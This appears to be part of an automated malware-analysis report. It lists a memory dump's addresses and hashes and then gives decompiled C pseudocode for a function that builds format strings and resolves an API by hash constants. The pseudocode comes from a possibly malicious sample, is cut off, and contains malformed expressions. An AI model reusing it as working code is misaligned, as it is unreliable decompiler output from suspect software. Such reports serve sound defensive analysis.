0x6ea14c0e
0x6ea14c10
0x00000000
0x6ea14c10
0x6ea143bd
0x6ea143bd
0x6ea143bf
0x6ea143c7
0x6ea143c9
0x6ea143cd
0x6ea143d1
0x6ea143d5
0x6ea143dd
0x6ea143e1
0x6ea143e9
0x6ea143ec
0x6ea14404
0x6ea14408
0x6ea14414
0x6ea14418
0x6ea1441e
0x6ea1441e
0x6ea14423
0x6ea14427
0x6ea1442d
0x00000000
0x00000000
0x6ea14433
0x6ea14438
0x00000000
0x6ea1443a
0x6ea1443a
0x6ea14444
0x00000000
0x6ea14446
0x6ea14446
0x6ea14450
0x6ea14457
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea14457
0x00000000
0x6ea14446
0x6ea14444
0x00000000
0x6ea14438
0x6ea14be6
0x6ea14be8
0x6ea14beb
0x6ea14bef
0x00000000
0x6ea143ee
0x6ea143f0
0x6ea143f2
0x6ea143f5
0x6ea143ff
0x6ea14402
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea14402
0x6ea14bf1
0x6ea14bf3
0x6ea14459
0x6ea14459
0x6ea14461
0x6ea14466
0x6ea14469
0x6ea1446d
0x6ea14473
0x6ea14478
0x6ea14483
0x6ea14489
0x6ea14498
0x6ea1449d
0x6ea1449f
0x6ea144a3
0x6ea144a8
0x6ea144ab
0x6ea144af
0x6ea144af
0x6ea144b3
0x6ea144b7
0x6ea144cd
0x6ea144d2
0x6ea144d2
0x6ea144d5
0x6ea144dc
0x6ea144de
0x6ea144e3
0x6ea146f5
0x6ea144e9
0x6ea144eb
0x6ea144ed
0x6ea144f2
0x6ea14685
0x6ea1468c
0x6ea14690
0x6ea14693
0x6ea14697
0x6ea146e3
0x6ea14699
0x6ea1469e
0x6ea146a0
0x6ea146a4
0x6ea146a7
0x6ea146ab
0x6ea146ad
0x6ea146b1
0x6ea146b3
0x6ea146b5
0x6ea146b5
0x6ea146b6
0x6ea146bb
0x6ea146c1
0x00000000
0x00000000
0x6ea146c3
0x6ea146c7
0x6ea146cc
0x00000000
0x00000000
0x00000000
0x6ea146cc
0x6ea146ce
0x6ea146ce
0x6ea146ab
0x6ea146d2
0x6ea146d4
0x6ea146d5
0x6ea146da
0x6ea146da
0x6ea146ea
0x6ea146ec
0x6ea14501
0x6ea14503
0x6ea14506
0x6ea14528
0x6ea1452c
0x6ea14538
0x6ea1453e
0x6ea14542
0x6ea14544
0x6ea14544
0x6ea14549
0x6ea1454d
0x6ea14553
0x00000000
0x00000000
0x6ea14559
0x6ea1455e
0x00000000
0x6ea14560
0x6ea14560
0x6ea1456c
0x6ea14582
0x6ea14582
0x6ea1456e
0x6ea1456e
0x6ea14570
0x6ea1457a
0x6ea14580
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea14580
0x6ea14b84
0x6ea14b84
0x6ea1456c
0x00000000
0x6ea1455e
0x6ea14b8d
0x6ea14b92
0x6ea14508
0x6ea14508
0x6ea14512
0x6ea14516
0x6ea14519
0x6ea14523
0x6ea14526
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea14526
0x6ea14b9b
0x6ea14b9b
0x6ea1458a
0x6ea14593
0x6ea14599
0x6ea1459e
0x6ea145b7
0x6ea145ba
0x6ea145be
0x6ea145c4
0x6ea145cc
0x6ea145cc
0x6ea145d8
0x6ea145db
0x6ea145df
0x6ea145e0
0x6ea145e5
0x6ea145e9
0x6ea145ec
0x6ea145f0
0x6ea1463c
0x6ea145f2
0x6ea145f7
0x6ea145f9
0x6ea145fb
0x6ea145fe
0x6ea14602
0x6ea14604
0x6ea14607
0x6ea14609
0x6ea1460d
0x6ea1460f
0x6ea1460f
0x6ea14610
0x6ea14615
0x6ea1461b
0x00000000
0x00000000
0x6ea1461d
0x6ea14621
0x6ea14626
0x00000000
0x00000000
0x00000000
0x6ea14626
0x6ea14628
0x6ea1462b
0x6ea1462b
0x6ea14602
0x6ea1462f
0x6ea14631
0x6ea14632
0x6ea14637
0x6ea14637
0x6ea14647
0x6ea1464a
0x6ea145a0
0x6ea145a0
0x6ea145a0
0x6ea14651
0x6ea14657
0x6ea1465b
0x6ea1465d
0x6ea14661
0x6ea14665
0x6ea14665
0x6ea14666
0x6ea1466b
0x6ea14671
0x00000000
0x00000000
0x6ea1467d
0x00000000
0x6ea1467f
0x6ea1467f
0x6ea1467f
0x00000000
0x6ea1467d
0x6ea14b77
0x6ea14b7b
0x6ea14b7b
0x6ea14651
0x6ea144f2
0x6ea146f7
0x6ea14703
0x6ea1470c
0x6ea1470d
0x6ea14711
0x00000000
0x6ea14bf9
0x6ea14bf3
0x6ea143ec
0x6ea14713
0x6ea14713
0x6ea1471d
0x6ea14721
0x6ea14725
0x6ea1472a
0x6ea14a96
0x6ea14a98
0x6ea14a9c
0x6ea14aa0
0x6ea14aa6
0x6ea14aaa
0x6ea14aac
0x6ea14bd2
0x6ea14ab2
0x6ea14ab4
0x6ea14ab8
0x6ea14aba
0x6ea14abc
0x6ea14abc
0x6ea14ac1
0x6ea14ac3
0x6ea14ac5
0x6ea14aca
0x6ea14aca
0x6ea14ace
0x6ea14ad4
0x6ea14ad6
0x6ea14ad8
0x6ea14add
0x6ea14add
0x6ea14ae1
0x6ea14ae2
0x6ea14ae6
0x6ea14ae8
0x6ea14aea
0x6ea14aee
0x6ea14aee
0x6ea14aee
0x6ea14af2
0x6ea14af7
0x6ea14af9
0x6ea14aff
0x6ea14b01
0x6ea14b03
0x6ea14b08
0x6ea14b08
0x6ea14aff
0x6ea14af7
0x6ea14730
0x6ea14730
0x6ea14736
0x6ea14738
0x6ea1473d
0x6ea1479a
0x6ea1479a
0x6ea1473f
0x6ea14741
0x6ea14744
0x6ea14746
0x6ea14bdc
0x6ea1474c
0x6ea1474c
0x6ea14750
0x6ea14752
0x6ea14754
0x6ea14754
0x6ea14759
0x6ea1475b
0x6ea1475d
0x6ea14762
0x6ea14762
0x6ea14765
0x6ea1476b
0x6ea1476d
0x6ea1476f
0x6ea14774
0x6ea14774
0x6ea14777
0x6ea14778
0x6ea1477c
0x6ea14780
0x6ea14780
0x6ea14780
0x6ea14784
0x6ea14789
0x6ea1478b
0x6ea14791
0x6ea14793
0x6ea14795
0x00000000
0x6ea14795
0x6ea14791
0x6ea14789
0x6ea1479d
0x6ea1479f
0x6ea147a0
0x6ea147a5
0x6ea147a8
0x6ea147ac
0x6ea147b5
0x6ea147d6
0x6ea147e0
0x6ea147e4
0x6ea147e7
0x6ea147ec
0x6ea147ef
0x6ea147f3
0x6ea147f6
0x6ea147fa
0x00000000
0x6ea147fc
0x6ea147fc
0x6ea14800
0x6ea14802
0x6ea14806
0x6ea14806
0x6ea14808
0x6ea1480e
0x6ea14810
0x6ea14815
0x6ea14a74
0x6ea14a76
0x6ea1481b
0x6ea1481d
0x6ea1481e
0x6ea14826
0x6ea14828
0x6ea14831
0x6ea14835
0x6ea1483c
0x6ea1483c
0x6ea14842
0x6ea14844
0x6ea14847
0x6ea1484b
0x6ea14a04
0x6ea14a06
0x6ea14a0b
0x6ea14a0f
0x6ea14a12
0x6ea14a16
0x6ea14a63
0x6ea14a18
0x6ea14a1c
0x6ea14a1e
0x6ea14a20
0x6ea14a23
0x6ea14a27
0x6ea14a29
0x6ea14a2d
0x6ea14a2f
0x6ea14a33
0x6ea14a35
0x6ea14a35
0x6ea14a36
0x6ea14a3b
0x6ea14a41
0x00000000
0x00000000
0x6ea14a43
0x6ea14a47
0x6ea14a4c
0x00000000
0x00000000
0x00000000
0x6ea14a4c
0x6ea14a4e
0x6ea14a52
0x6ea14a52
0x6ea14a27
0x6ea14a56
0x6ea14a58
0x6ea14a59
0x6ea14a5e
0x6ea14a5e
0x6ea14a69
0x6ea14a6b
0x6ea1485a
0x6ea1485c
0x6ea1485f
0x6ea14881
0x6ea14885
0x6ea14891
0x6ea14896
0x6ea1489a
0x6ea1489e
0x6ea148a0
0x6ea148a0
0x6ea148a5
0x6ea148a9
0x6ea148af
0x00000000
0x00000000
0x6ea148b5
0x6ea148ba
0x00000000
0x6ea148bc
0x6ea148bc
0x6ea148c0
0x6ea148cc
0x6ea148e4
0x6ea148e4
0x6ea148ce
0x6ea148ce
0x6ea148d2
0x6ea148dc
0x6ea148e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea148e2
0x00000000
0x6ea148d2
0x6ea148cc
0x00000000
0x6ea148ba
0x6ea14bc0
0x6ea14bc5
0x6ea14bc9
0x6ea14861
0x6ea14861
0x6ea1486b
0x6ea1486f
0x6ea14872
0x6ea1487c
0x6ea1487f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea1487f
0x6ea14bb7
0x6ea14bb7
0x6ea14bb7
0x6ea148ec
0x6ea148fb
0x6ea14900
0x6ea14913
0x6ea14916
0x6ea1491a
0x6ea1491f
0x6ea14927
0x6ea14927
0x6ea14934
0x6ea14937
0x6ea1493b
0x6ea1493c
0x6ea14940
0x6ea14945
0x6ea14949
0x6ea1494b
0x6ea1494e
0x6ea14950
0x6ea14956
0x6ea149bc
0x6ea14958
0x6ea1495a
0x6ea1495c
0x6ea1495f
0x6ea14963
0x6ea14965
0x6ea14969
0x6ea1496b
0x6ea1496f
0x6ea14973
0x6ea14977
0x6ea14977
0x6ea14978
0x6ea1497d
0x6ea14983
0x00000000
0x00000000
0x6ea14985
0x6ea14989
0x6ea1498e
0x00000000
0x00000000
0x00000000
0x6ea1498e
0x6ea14990
0x6ea14994
0x6ea14998
0x6ea14998
0x6ea14963
0x6ea1499c
0x6ea1499e
0x6ea149a2
0x6ea149a6
0x6ea149aa
0x6ea149af
0x6ea149b3
0x6ea149b7
0x6ea149b7
0x6ea149c3
0x6ea149c6
0x6ea14902
0x6ea14902
0x6ea14902
0x6ea149ca
0x6ea149d2
0x6ea149d6
0x6ea149da
0x6ea149dc
0x6ea149e0
0x6ea149e0
0x6ea149e1
0x6ea149e6
0x6ea149ec
0x00000000
0x00000000
0x6ea149f8
0x00000000
0x6ea149fa
0x6ea149fa
0x6ea149fe
0x6ea149fe
0x00000000
0x6ea149f8
0x6ea14ba6
0x6ea14baa
0x6ea14bae
0x6ea14bae
0x6ea149ca
0x6ea1484b
0x6ea14a7d
0x6ea14a7d
0x6ea14a84
0x6ea14a88
0x6ea14a90
0x6ea14a92
0x00000000
0x6ea14a92
0x6ea147b7
0x6ea147b7
0x6ea147b9
0x6ea147bd
0x6ea147c1
0x6ea147c1
0x6ea147b5
0x6ea1472a
0x6ea143b7
0x6ea14b0c
0x6ea14b0e
0x6ea14b0f
0x6ea14b17
0x6ea14b2a
0x6ea14b2a
0x00000000

Strings

, xrefs: 6EA13EF7

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 3c30907217fd61ddab17df5b80175c4209bb753f7a276f098d6e8ca77910dbd3
Instruction ID: 9e57eea1aab8495c6b4e092b106514c6413b937fb7aea76dcec469534da34bd7
Opcode Fuzzy Hash: 3c30907217fd61ddab17df5b80175c4209bb753f7a276f098d6e8ca77910dbd3
Instruction Fuzzy Hash: E392077060C3538FD315CEADC49039ABBE2AFC531CF198A6DE8A59B351D734C9868786

Uniqueness

Uniqueness Score: -1.00%

Function 6EA162F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E6EA162F0(intOrPtr* __ecx, signed int __edx, void* __eflags, char _a4) {
				intOrPtr* _v24;
				char _v32;
				intOrPtr _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v52;
				char _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t272;
				char _t278;
				char _t279;
				char* _t281;
				signed int _t282;
				char _t283;
				void* _t287;
				char _t290;
				char _t291;
				char* _t293;
				signed int _t294;
				char _t295;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr* _t308;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				char* _t320;
				char* _t321;
				signed int _t322;
				unsigned int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t342;
				char* _t343;
				char* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				char* _t353;
				char* _t357;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t365;
				unsigned int _t375;
				signed int _t377;
				signed int _t381;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t395;
				signed int _t407;
				signed int _t417;
				char* _t418;
				char _t420;
				signed int _t421;
				void* _t431;
				char _t432;
				char _t434;
				char _t435;
				char* _t436;
				char _t438;
				char* _t439;
				char _t440;
				signed int _t441;
				void* _t451;
				char _t452;
				char _t454;
				char _t455;
				char* _t456;
				char _t458;
				char _t460;
				char _t461;
				signed int _t463;
				signed int _t465;
				void* _t469;
				char _t471;
				char _t472;
				signed int _t476;
				void* _t478;
				char _t480;
				char _t481;
				void* _t482;
				char _t484;
				char _t485;
				char _t489;
				char _t490;
				char _t491;
				char _t492;
				char _t493;
				char _t494;
				signed int _t497;
				char* _t499;
				void* _t505;
				unsigned int _t506;
				void* _t512;
				char* _t514;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t523;
				signed int _t524;
				void* _t531;
				void* _t537;
				void* _t543;
				signed int _t544;
				signed int _t548;
				void* _t551;
				void* _t552;
				void* _t553;

				_t306 = __ecx;
				_push(0x40);
				_t496 = __edx;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t514 = E6EA01030();
				_t551 = (_t548 & 0xfffffff0) - 0x34 + 4;
				_t320 =  *__ecx;
				if(_t320 == 0) {
					 *_t514 = 0;
				} else {
					if(_t514 != 0) {
						_t492 =  *_t320;
						 *_t514 = _t492;
						if(_t492 != 0) {
							_v68 = __edx;
							_t304 = 0;
							while(1) {
								_t304 = _t304 + 1;
								_t493 =  *((char*)(_t320 + _t304 * 2 - 1));
								 *((char*)(_t514 + _t304 * 2 - 1)) = _t493;
								if(_t493 == 0) {
									break;
								}
								_t494 =  *((char*)(_t320 + _t304 * 2));
								 *((char*)(_t514 + _t304 * 2)) = _t494;
								if(_t494 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
					}
					_push(1);
					_push(_t320);
					E6EA010B0();
					_t551 = _t551 + 8;
				}
				_v44 = 0;
				_push(0x40);
				 *_t306 = _t514;
				 *((intOrPtr*)(_t306 + 4)) = 0x40;
				_t264 = E6EA01030();
				_t552 = _t551 + 4;
				_t321 = _v44;
				if(_t321 == 0) {
					 *_t264 = 0;
					_v40 = 0x40;
					_v44 = _t264;
					L18:
					_t387 = _t264 & 0x0000000f;
					if(_t387 == 0) {
						L22:
						asm("pxor xmm0, xmm0");
						_t520 =  ~( ~_t387 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [eax+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb ecx, xmm1");
							if(_t321 != 0) {
								break;
							}
							_t387 = _t387 + 0x10;
							if(_t387 < _t520) {
								continue;
							} else {
								if(_t520 >= 0x7fffffff) {
									L28:
									_t520 = 0x7fffffff;
									goto L29;
								} else {
									while( *((char*)(_t520 + _t264)) != 0) {
										_t520 = _t520 + 1;
										if(_t520 < 0x7fffffff) {
											continue;
										} else {
											goto L28;
										}
										goto L30;
									}
									goto L249;
								}
							}
							goto L30;
						}
						asm("bsf esi, ecx");
						_t520 = _t520 + _t387;
						goto L249;
					} else {
						_t520 = 0;
						_t387 =  ~_t387 + 0x10;
						while( *((char*)(_t520 + _t264)) != 0) {
							_t520 = _t520 + 1;
							if(_t520 < _t387) {
								continue;
							} else {
								goto L22;
							}
							goto L30;
						}
						L249:
						if(_t520 != 0xfffffffe || _t264 == 0) {
							goto L29;
						} else {
							 *_t264 = 0;
							_t322 = _v40;
							goto L30;
						}
						L124:
						 *((char*)(_t269 + _t523)) = 0x64;
						_t417 = _v44;
						 *((char*)(_t523 + _t417 + 1)) = 0;
						if(_a4 == 0) {
							_v32 = _t496;
							_t497 = _v44;
							_v36 = _t497;
							_push(0x200);
							_t524 = E6EA01030();
							_t553 = _t552 + 4;
							_v24 = _t306;
							_t272 = L6EA015C0(0x588ab3ea, 0x8a156a0e);
							if(_t272 == 0) {
								_t308 = _v24;
								if(_t524 == 0 ||  *_t524 == 0) {
									_t418 =  *_t308;
									if(_t418 != 0) {
										 *_t418 = 0;
									}
									if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
										_push(0x40);
										_t499 = E6EA01030();
										_t553 = _t553 + 4;
										_t344 =  *_t308;
										if(_t344 == 0) {
											 *_t499 = 0;
										} else {
											if(_t499 != 0) {
												_t420 =  *_t344;
												 *_t499 = _t420;
												if(_t420 != 0) {
													_v24 = _t308;
													_t421 = 0;
													while(1) {
														_t421 = _t421 + 1;
														_t278 =  *((char*)(_t344 + _t421 * 2 - 1));
														 *((char*)(_t499 + _t421 * 2 - 1)) = _t278;
														if(_t278 == 0) {
															break;
														}
														_t279 =  *((char*)(_t344 + _t421 * 2));
														 *((char*)(_t499 + _t421 * 2)) = _t279;
														if(_t279 != 0) {
															continue;
														}
														break;
													}
													_t308 = _v24;
												}
											}
											_push(1);
											_push(_t344);
											E6EA010B0();
											_t553 = _t553 + 8;
										}
										goto L224;
									}
								} else {
									_t346 = _t524 & 0x0000000f;
									if(_t346 == 0) {
										L183:
										asm("pxor xmm0, xmm0");
										_t505 =  ~( ~_t346 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm1, [esi+ecx]");
											asm("pcmpeqb xmm1, xmm0");
											asm("pmovmskb edx, xmm1");
											if(_t417 != 0) {
												break;
											}
											_t346 = _t346 + 0x10;
											if(_t346 < _t505) {
												continue;
											} else {
												if(_t505 >= 0x7fffffff) {
													L189:
													_t505 = 0x7fffffff;
												} else {
													while( *((char*)(_t505 + _t524)) != 0) {
														_t505 = _t505 + 1;
														if(_t505 < 0x7fffffff) {
															continue;
														} else {
															goto L189;
														}
														goto L190;
													}
													goto L233;
												}
											}
											goto L190;
										}
										asm("bsf edi, edx");
										_t505 = _t505 + _t346;
										goto L233;
									} else {
										_t505 = 0;
										_t346 =  ~_t346 + 0x10;
										while( *((char*)(_t505 + _t524)) != 0) {
											_t505 = _t505 + 1;
											if(_t505 < _t346) {
												continue;
											} else {
												goto L183;
											}
											goto L190;
										}
										L233:
										if(_t505 == 0xffffffff) {
											_t436 =  *_t308;
											if(_t436 != 0) {
												 *_t436 = 0;
											}
										}
									}
									L190:
									_t216 = _t505 + 1; // 0x80000000
									_t348 =  <=  ? 0x40 : _t216;
									if(_t348 >  *((intOrPtr*)(_t308 + 4))) {
										_v64 = (_t348 >> 5 >> 0x1a) + _t348 >> 6;
										_t349 = _t348 & 0x8000003f;
										if(_t349 < 0) {
											_t349 = (_t349 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t352 = _v64 + (0 | _t349 > 0x00000000) << 6;
										_v64 = _t352;
										_push(_t352);
										_t353 = E6EA01030();
										_t553 = _t553 + 4;
										_t281 =  *_t308;
										if(_t281 == 0) {
											 *_t353 = 0;
										} else {
											if(_t353 != 0) {
												_t432 =  *_t281;
												 *_t353 = _t432;
												if(_t432 != 0) {
													_v68 = _t524;
													_v24 = _t308;
													_t311 = 0;
													while(1) {
														_t311 = _t311 + 1;
														_t434 =  *((char*)(_t281 + _t311 * 2 - 1));
														 *((char*)(_t353 + _t311 * 2 - 1)) = _t434;
														if(_t434 == 0) {
															break;
														}
														_t435 =  *((char*)(_t281 + _t311 * 2));
														 *((char*)(_t353 + _t311 * 2)) = _t435;
														if(_t435 != 0) {
															continue;
														}
														break;
													}
													_t524 = _v68;
													_t308 = _v24;
												}
											}
											_push(1);
											_push(_t281);
											_v68 = _t353;
											E6EA010B0();
											_t353 = _v68;
											_t553 = _t553 + 8;
										}
										 *((intOrPtr*)(_t308 + 4)) = _v64;
										 *_t308 = _t353;
									} else {
										_t353 =  *_t308;
									}
									_t282 = _t524;
									if(_t353 != 0 && _t524 != 0) {
										_v24 = _t308;
										_t431 = 0;
										_t310 = _t282;
										while(1) {
											_t283 =  *_t310;
											_t431 = _t431 + 1;
											 *_t353 = _t283;
											if(_t505 != 0 && _t431 == _t505) {
												goto L227;
											}
											if(_t283 == 0) {
												goto L228;
											} else {
												_t353 = _t353 + 1;
												_t310 = _t310 + 1;
												continue;
											}
											goto L225;
										}
										goto L227;
									}
								}
								goto L225;
							} else {
								_push( &_v32);
								_push(_t497);
								_push(0x200);
								_push(_t524);
								asm("int3");
								return _t272;
							}
						} else {
							_v52 = _t496;
							_t438 = _a4;
							_t506 = _v44;
							_v56 = _t438;
							_v60 = _t506;
							_push(0x200);
							_t524 = E6EA01030();
							_t553 = _t552 + 4;
							_v24 = _t306;
							_t287 = L6EA015C0(0x588ab3ea, 0x8a156a0e);
							if(_t287 == 0) {
								_t308 = _v24;
								if(_t524 == 0 ||  *_t524 == 0) {
									_t439 =  *_t308;
									if(_t439 != 0) {
										 *_t439 = 0;
									}
									if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
										_push(0x40);
										_t499 = E6EA01030();
										_t553 = _t553 + 4;
										_t357 =  *_t308;
										if(_t357 == 0) {
											 *_t499 = 0;
										} else {
											if(_t499 != 0) {
												_t440 =  *_t357;
												 *_t499 = _t440;
												if(_t440 != 0) {
													_v24 = _t308;
													_t441 = 0;
													while(1) {
														_t441 = _t441 + 1;
														_t290 =  *((char*)(_t357 + _t441 * 2 - 1));
														 *((char*)(_t499 + _t441 * 2 - 1)) = _t290;
														if(_t290 == 0) {
															break;
														}
														_t291 =  *((char*)(_t357 + _t441 * 2));
														 *((char*)(_t499 + _t441 * 2)) = _t291;
														if(_t291 != 0) {
															continue;
														}
														break;
													}
													_t308 = _v24;
												}
											}
											_push(1);
											_push(_t357);
											E6EA010B0();
											_t553 = _t553 + 8;
										}
										L224:
										 *_t308 = _t499;
										 *((intOrPtr*)(_t308 + 4)) = 0x40;
									}
								} else {
									_t359 = _t524 & 0x0000000f;
									if(_t359 == 0) {
										L133:
										asm("pxor xmm0, xmm0");
										_t512 =  ~( ~_t359 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm1, [esi+ecx]");
											asm("pcmpeqb xmm1, xmm0");
											asm("pmovmskb edx, xmm1");
											if(_t438 != 0) {
												break;
											}
											_t359 = _t359 + 0x10;
											if(_t359 < _t512) {
												continue;
											} else {
												if(_t512 >= 0x7fffffff) {
													L139:
													_t512 = 0x7fffffff;
												} else {
													while( *((char*)(_t512 + _t524)) != 0) {
														_t512 = _t512 + 1;
														if(_t512 < 0x7fffffff) {
															continue;
														} else {
															goto L139;
														}
														goto L140;
													}
													goto L229;
												}
											}
											goto L140;
										}
										asm("bsf edi, edx");
										_t512 = _t512 + _t359;
										goto L229;
									} else {
										_t512 = 0;
										_t359 =  ~_t359 + 0x10;
										while( *((char*)(_t512 + _t524)) != 0) {
											_t512 = _t512 + 1;
											if(_t512 < _t359) {
												continue;
											} else {
												goto L133;
											}
											goto L140;
										}
										L229:
										if(_t512 == 0xffffffff) {
											_t456 =  *_t308;
											if(_t456 != 0) {
												 *_t456 = 0;
											}
										}
									}
									L140:
									_t171 = _t512 + 1; // 0x80000000
									_t361 =  <=  ? 0x40 : _t171;
									if(_t361 >  *((intOrPtr*)(_t308 + 4))) {
										_v64 = (_t361 >> 5 >> 0x1a) + _t361 >> 6;
										_t362 = _t361 & 0x8000003f;
										if(_t362 < 0) {
											_t362 = (_t362 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t365 = _v64 + (0 | _t362 > 0x00000000) << 6;
										_v64 = _t365;
										_push(_t365);
										_t353 = E6EA01030();
										_t553 = _t553 + 4;
										_t293 =  *_t308;
										if(_t293 == 0) {
											 *_t353 = 0;
										} else {
											if(_t353 != 0) {
												_t452 =  *_t293;
												 *_t353 = _t452;
												if(_t452 != 0) {
													_v68 = _t524;
													_v24 = _t308;
													_t314 = 0;
													while(1) {
														_t314 = _t314 + 1;
														_t454 =  *((char*)(_t293 + _t314 * 2 - 1));
														 *((char*)(_t353 + _t314 * 2 - 1)) = _t454;
														if(_t454 == 0) {
															break;
														}
														_t455 =  *((char*)(_t293 + _t314 * 2));
														 *((char*)(_t353 + _t314 * 2)) = _t455;
														if(_t455 != 0) {
															continue;
														}
														break;
													}
													_t524 = _v68;
													_t308 = _v24;
												}
											}
											_push(1);
											_push(_t293);
											_v68 = _t353;
											E6EA010B0();
											_t353 = _v68;
											_t553 = _t553 + 8;
										}
										 *((intOrPtr*)(_t308 + 4)) = _v64;
										 *_t308 = _t353;
									} else {
										_t353 =  *_t308;
									}
									_t294 = _t524;
									if(_t353 != 0 && _t524 != 0) {
										_v24 = _t308;
										_t451 = 0;
										_t313 = _t294;
										while(1) {
											_t295 =  *_t313;
											_t451 = _t451 + 1;
											 *_t353 = _t295;
											if(_t512 != 0 && _t451 == _t512) {
												break;
											}
											if(_t295 == 0) {
												L228:
												_t308 = _v24;
											} else {
												_t353 = _t353 + 1;
												_t313 = _t313 + 1;
												continue;
											}
											goto L225;
										}
										L227:
										_t308 = _v24;
										 *((char*)(_t353 + 1)) = 0;
									}
								}
								L225:
								_push(1);
								_push(_t524);
								E6EA010B0();
								_push(1);
								_push(_v44);
								E6EA010B0();
								_v44 = 0;
								_v40 = 0;
								return _t308;
							} else {
								_push( &_v56);
								_push(_t506);
								_push(0x200);
								_push(_t524);
								asm("int3");
								return _t287;
							}
						}
					}
				} else {
					if(_t264 == 0) {
						_push(1);
						_push(_t321);
						E6EA010B0();
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_t520 = 0;
						_v44 = 0;
						L29:
						_t322 = 0x40;
					} else {
						_t489 =  *_t321;
						 *_t264 = _t489;
						if(_t489 != 0) {
							_v40 = 0;
							_t544 = 0;
							_v68 = _t496;
							while(1) {
								_t544 = _t544 + 1;
								_t490 =  *((char*)(_t321 + _t544 * 2 - 1));
								 *((char*)(_t264 + _t544 * 2 - 1)) = _t490;
								if(_t490 == 0) {
									break;
								}
								_t491 =  *((char*)(_t321 + _t544 * 2));
								 *((char*)(_t264 + _t544 * 2)) = _t491;
								if(_t491 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
						_push(1);
						_push(_t321);
						_v64 = _t264;
						E6EA010B0();
						_t264 = _v64;
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_v44 = _t264;
						goto L18;
					}
				}
				L30:
				_t34 = _t520 + 2; // -2147483660
				_t389 =  <=  ? 0x40 : _t34;
				if(_t322 < _t389) {
					_t327 = (_t389 >> 5 >> 0x1a) + _t389 >> 6;
					_v60 = _t327;
					_t390 = _t389 & 0x8000003f;
					if(_t390 < 0) {
						_t390 = (_t390 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t329 = _t327 + (0 | _t390 > 0x00000000) << 6;
					_v60 = _t329;
					_push(_t329);
					_t266 = E6EA01030();
					_t552 = _t552 + 4;
					_t330 = _v44;
					if(_t330 == 0) {
						 *_t266 = 0;
					} else {
						if(_t266 != 0) {
							_t482 =  *_t330;
							 *_t266 = _t482;
							if(_t482 != 0) {
								_v24 = _t306;
								_t318 = 0;
								_v68 = _t496;
								while(1) {
									_t318 = _t318 + 1;
									_t484 =  *((char*)(_t330 + _t318 * 2 - 1));
									 *((char*)(_t266 + _t318 * 2 - 1)) = _t484;
									if(_t484 == 0) {
										break;
									}
									_t485 =  *((char*)(_t330 + _t318 * 2));
									 *((char*)(_t266 + _t318 * 2)) = _t485;
									if(_t485 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t330);
						_v64 = _t266;
						E6EA010B0();
						_t266 = _v64;
						_t552 = _t552 + 8;
					}
					_v40 = _v60;
					_v44 = _t266;
				} else {
					_t266 = _v44;
				}
				 *((char*)(_t266 + _t520)) = 0x25;
				 *((char*)(_t520 + _v44 + 1)) = 0;
				if(_a4 != 0) {
					_t395 = _v44;
					if(_t395 == 0) {
						_t521 = 0;
					} else {
						_t381 = _t395 & 0x0000000f;
						if(_t381 == 0) {
							L51:
							asm("pxor xmm0, xmm0");
							_t543 =  ~( ~_t381 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [edx+ecx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								if(_t266 != 0) {
									break;
								}
								_t381 = _t381 + 0x10;
								if(_t381 < _t543) {
									continue;
								} else {
									if(_t543 >= 0x7fffffff) {
										L57:
										_t521 = 0x7fffffff;
									} else {
										while( *((char*)(_t543 + _t395)) != 0) {
											_t543 = _t543 + 1;
											if(_t543 < 0x7fffffff) {
												continue;
											} else {
												goto L57;
											}
											goto L58;
										}
										goto L245;
									}
								}
								goto L58;
							}
							asm("bsf esi, eax");
							_t521 = _t543 + _t381;
							goto L245;
						} else {
							_t521 = 0;
							_t381 =  ~_t381 + 0x10;
